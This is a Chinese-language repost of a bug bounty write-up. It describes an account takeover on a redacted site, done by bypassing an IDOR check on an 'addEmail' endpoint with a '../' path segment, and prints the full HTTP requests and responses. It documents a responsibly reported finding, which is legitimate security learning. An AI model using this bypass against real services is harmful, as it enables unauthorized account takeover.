实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

admin 2022年11月21日17:16:43评论33 views字数 2030阅读6分46秒阅读模式

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

价值 2500 美元的账户接管

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

在这篇文章中,我将分享我如何通过简单的 IDOR 绕过导致账户接管而赚取 2500 美元。

由于我不能透露该程序的名称,根据他们的披露政策,我将其称为 redacted.com。

在 redacted.com 上,您可以创建一个组织并添加该组织的成员,有两个选项可以在组织中添加成员。

首先,您可以通过使用他们的电子邮件地址邀请他们来添加成员。

其次是添加一个没有电子邮件的成员,只有成员的名字,这称为演示用户,添加演示用户后,您可以编辑它并添加一个电子邮件地址,使其成为实际用户。

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

使用电子邮件地址添加成员

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

通过提供名称添加成员(演示用户)

创建演示用户后,我添加了一个电子邮件地址,使其成为我组织中的实际用户,但是当我转到我的 Burp Suite 请求历史记录时,我注意到了这个请求

POST /<organizationID>/addEmail/<DemoUserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
  "email":"[email protected]"
}

如果我将<DemoUserID>更改为我组织内 任何成员的UserID ,会发生什么情况?

结果如下:

HTTP/2 403 Forbidden
Date: Tue, 15 Nov 2022 14:44:25 GMT
Content-Type: application/json
Content-Length: 76
Pragma: no-cache
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff


{
  "message":"You don't have access to this.",
}

尝试了几个小时的bypass,找到了可以用的,最后bypass的规则是这样的

POST /<organizationID>/addEmail/<DemoUserID>/../<UserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
  "email":"[email protected]"
}

请求的响应

HTTP/2 200 OK
Date: Tue, 15 Nov 2022 14:43:32 GMT
Content-Type: application/json
Content-Length: 2
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff

{
}  

关联的 <UserID> 的电子邮件地址将更改为攻击者控制的电子邮件。


报告提交时间:

我在晚上 10 点左右发现了这个漏洞,并立即提交了报告,第二天早上,我收到了团队的回复并获得了2500美金赏金

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

作者:Jefferson Gonzales

原文来自「HACK学习呀」|侵删

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。我们每天都会分享各种IT相关内容,如果您有任何关于IT疑问,欢迎给我们留言实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

原文始发于微信公众号(寰宇卫士):实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月21日17:16:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 记一次价值 2500 美元的账户接管漏洞挖掘http://cn-sec.com/archives/1420649.html

发表评论

匿名网友 填写信息